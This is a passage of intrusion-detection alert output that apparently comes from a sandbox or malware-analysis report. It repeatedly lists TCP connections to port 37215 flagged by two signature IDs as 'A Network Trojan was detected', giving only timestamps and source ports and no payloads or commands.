                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.165723
                  SID:2835222
                  Source Port:40842
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.620952
                  SID:2829579
                  Source Port:34516
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.980089
                  SID:2835222
                  Source Port:55638
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.058736
                  SID:2829579
                  Source Port:46834
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.367080
                  SID:2829579
                  Source Port:50414
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.904886
                  SID:2835222
                  Source Port:52586
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.832991
                  SID:2829579
                  Source Port:35786
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.600336
                  SID:2829579
                  Source Port:52192
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.875124
                  SID:2835222
                  Source Port:45326
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.431557
                  SID:2835222
                  Source Port:35040
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.159538
                  SID:2829579
                  Source Port:51652
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.476455
                  SID:2835222
                  Source Port:43150
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.112461
                  SID:2829579
                  Source Port:38350
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.162130
                  SID:2829579
                  Source Port:34964
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:48.020359
                  SID:2829579
                  Source Port:44402
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.303785
                  SID:2829579
                  Source Port:34116
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.521527
                  SID:2835222
                  Source Port:55680
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.301288
                  SID:2829579
                  Source Port:35306
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.842425
                  SID:2835222
                  Source Port:43260
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.172720
                  SID:2835222
                  Source Port:43328
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.431094
                  SID:2829579
                  Source Port:48880
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.650012
                  SID:2835222
                  Source Port:36324
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.728066
                  SID:2835222
                  Source Port:32904
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:34.133115
                  SID:2829579
                  Source Port:57002
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.929759
                  SID:2829579
                  Source Port:32808
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.288558
                  SID:2829579
                  Source Port:35240
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.138788
                  SID:2829579
                  Source Port:44652
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.742561
                  SID:2829579
                  Source Port:33500
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.520266
                  SID:2829579
                  Source Port:39960
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.400530
                  SID:2829579
                  Source Port:35876
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.573004
                  SID:2835222
                  Source Port:43820
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.917695
                  SID:2829579
                  Source Port:54246
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.893845
                  SID:2829579
                  Source Port:42292
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.810529
                  SID:2835222
                  Source Port:53554
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.596946
                  SID:2835222
                  Source Port:51612
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.660346
                  SID:2829579
                  Source Port:59856
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:48.024550
                  SID:2829579
                  Source Port:47190
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.619989
                  SID:2835222
                  Source Port:43768
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.614472
                  SID:2835222
                  Source Port:55410
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.112829
                  SID:2829579
                  Source Port:52450
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.860348
                  SID:2829579
                  Source Port:33140
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:18.009286
                  SID:2835222
                  Source Port:36914
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.021127
                  SID:2835222
                  Source Port:49792
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.440682
                  SID:2829579
                  Source Port:54938
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:51.996552
                  SID:2835222
                  Source Port:58468
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.474823
                  SID:2835222
                  Source Port:36590
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.641903
                  SID:2829579
                  Source Port:43506
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.233707
                  SID:2829579
                  Source Port:43326
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.993210
                  SID:2835222
                  Source Port:56922
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.360287
                  SID:2829579
                  Source Port:44360
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.953541
                  SID:2829579
                  Source Port:58310
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.869389
                  SID:2835222
                  Source Port:34520
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.347841
                  SID:2835222
                  Source Port:33732
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.426882
                  SID:2829579
                  Source Port:57748
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.249834
                  SID:2835222
                  Source Port:53230
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.858364
                  SID:2829579
                  Source Port:45812
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.834773
                  SID:2835222
                  Source Port:42298
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.090414
                  SID:2835222
                  Source Port:36318
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.350538
                  SID:2835222
                  Source Port:51716
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.585951
                  SID:2835222
                  Source Port:42070
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.645814
                  SID:2829579
                  Source Port:52600
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.547327
                  SID:2829579
                  Source Port:45068
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.175813
                  SID:2835222
                  Source Port:35528
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.537049
                  SID:2829579
                  Source Port:45988
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.507922
                  SID:2829579
                  Source Port:48244
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.556012
                  SID:2829579
                  Source Port:33122
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.542013
                  SID:2829579
                  Source Port:37558
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.416774
                  SID:2829579
                  Source Port:40824
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.531009
                  SID:2829579
                  Source Port:46368
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.485885
                  SID:2835222
                  Source Port:55618
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.537865
                  SID:2835222
                  Source Port:40012
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.989759
                  SID:2829579
                  Source Port:34020
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.972304
                  SID:2835222
                  Source Port:60388
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.517313
                  SID:2829579
                  Source Port:56200
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.128612
                  SID:2835222
                  Source Port:40440
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.776398
                  SID:2829579
                  Source Port:37766
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.328619
                  SID:2835222
                  Source Port:40550
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.832260
                  SID:2829579
                  Source Port:47052
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.167079
                  SID:2829579
                  Source Port:52390
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.752380
                  SID:2835222
                  Source Port:55574
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.045782
                  SID:2829579
                  Source Port:41250
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.553494
                  SID:2829579
                  Source Port:38646
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.905026
                  SID:2835222
                  Source Port:46598
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.562285
                  SID:2829579
                  Source Port:53524
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.466175
                  SID:2835222
                  Source Port:54584
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.427949
                  SID:2829579
                  Source Port:53820
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.475374
                  SID:2829579
                  Source Port:46918
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.042131
                  SID:2835222
                  Source Port:56728
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.867297
                  SID:2829579
                  Source Port:35034
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.790185
                  SID:2835222
                  Source Port:55678
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.802281
                  SID:2835222
                  Source Port:49332
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.476399
                  SID:2829579
                  Source Port:35834
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.376307
                  SID:2835222
                  Source Port:49176
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.846254
                  SID:2835222
                  Source Port:50046
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.857509
                  SID:2829579
                  Source Port:53042
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.631590
                  SID:2835222
                  Source Port:42722
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.234449
                  SID:2829579
                  Source Port:33032
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.358335
                  SID:2835222
                  Source Port:47686
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.231407
                  SID:2829579
                  Source Port:41174
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.109187
                  SID:2835222
                  Source Port:42222
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.444942
                  SID:2835222
                  Source Port:36448
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.169251
                  SID:2829579
                  Source Port:52326
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.875122
                  SID:2835222
                  Source Port:40086
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.339308
                  SID:2835222
                  Source Port:55594
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.863790
                  SID:2835222
                  Source Port:60698
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.841336
                  SID:2835222
                  Source Port:45284
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.675558
                  SID:2829579
                  Source Port:35928
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.245285
                  SID:2835222
                  Source Port:36760
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.413827
                  SID:2829579
                  Source Port:45138
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.986988
                  SID:2829579
                  Source Port:36582
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.436388
                  SID:2829579
                  Source Port:48526
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.550215
                  SID:2829579
                  Source Port:57462
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.178125
                  SID:2829579
                  Source Port:33596
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.415648
                  SID:2829579
                  Source Port:55258
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.541812
                  SID:2829579
                  Source Port:48594
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.538879
                  SID:2829579
                  Source Port:60248
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.675779
                  SID:2829579
                  Source Port:45950
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.117247
                  SID:2829579
                  Source Port:51596
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.522450
                  SID:2829579
                  Source Port:53288
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.824785
                  SID:2829579
                  Source Port:46320
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.837013
                  SID:2829579
                  Source Port:54302
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.870897
                  SID:2829579
                  Source Port:39288
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.179057
                  SID:2835222
                  Source Port:36552
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.191849
                  SID:2835222
                  Source Port:55592
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.878263
                  SID:2835222
                  Source Port:33962
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.728066
                  SID:2829579
                  Source Port:43346
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.109836
                  SID:2829579
                  Source Port:44146
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.483733
                  SID:2835222
                  Source Port:55954
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.609606
                  SID:2829579
                  Source Port:45934
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.650487
                  SID:2835222
                  Source Port:42108
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.035861
                  SID:2829579
                  Source Port:51836
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.689305
                  SID:2829579
                  Source Port:46948
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.554862
                  SID:2829579
                  Source Port:57944
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.646410
                  SID:2829579
                  Source Port:54972
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.156857
                  SID:2835222
                  Source Port:36010
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.617343
                  SID:2829579
                  Source Port:37400
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.810148
                  SID:2835222
                  Source Port:48766
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.964931
                  SID:2835222
                  Source Port:49066
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.863790
                  SID:2829579
                  Source Port:51480
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.356650
                  SID:2835222
                  Source Port:46392
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.433814
                  SID:2835222
                  Source Port:49424
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.912875
                  SID:2829579
                  Source Port:38910
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.906532
                  SID:2829579
                  Source Port:57384
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.549542
                  SID:2829579
                  Source Port:59718
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.127145
                  SID:2835222
                  Source Port:55724
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.064051
                  SID:2835222
                  Source Port:54510
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.675135
                  SID:2829579
                  Source Port:58472
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.622208
                  SID:2835222
                  Source Port:39400
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.518059
                  SID:2829579
                  Source Port:39668
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.380446
                  SID:2835222
                  Source Port:36638
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.848074
                  SID:2835222
                  Source Port:43778
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.237467
                  SID:2835222
                  Source Port:52534
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.612350
                  SID:2829579
                  Source Port:49800
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.426647
                  SID:2829579
                  Source Port:50068
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.021968
                  SID:2835222
                  Source Port:52388
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.486593
                  SID:2835222
                  Source Port:56298
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.422822
                  SID:2829579
                  Source Port:55028
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.936366
                  SID:2835222
                  Source Port:35472
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.958749
                  SID:2835222
                  Source Port:57258
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.638467
                  SID:2835222
                  Source Port:33394
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:48.012833
                  SID:2835222
                  Source Port:39320
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.592748
                  SID:2835222
                  Source Port:36448
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.914013
                  SID:2835222
                  Source Port:53160
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.787399
                  SID:2835222
                  Source Port:46518
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.501206
                  SID:2835222
                  Source Port:46282
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.714524
                  SID:2829579
                  Source Port:36326
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.242541
                  SID:2829579
                  Source Port:57378
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.429135
                  SID:2835222
                  Source Port:35114
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.346552
                  SID:2829579
                  Source Port:55608
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.834226
                  SID:2829579
                  Source Port:34340
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.970962
                  SID:2835222
                  Source Port:44982
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.865021
                  SID:2835222
                  Source Port:52056
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.501206
                  SID:2835222
                  Source Port:36432
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.638597
                  SID:2835222
                  Source Port:40526
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.022558
                  SID:2829579
                  Source Port:38834
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.298138
                  SID:2835222
                  Source Port:38594
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.172651
                  SID:2835222
                  Source Port:39948
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.042445
                  SID:2829579
                  Source Port:55728
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.165104
                  SID:2829579
                  Source Port:59758
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.171262
                  SID:2835222
                  Source Port:39662
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.237467
                  SID:2835222
                  Source Port:51926
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.980706
                  SID:2835222
                  Source Port:38052
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.591904
                  SID:2835222
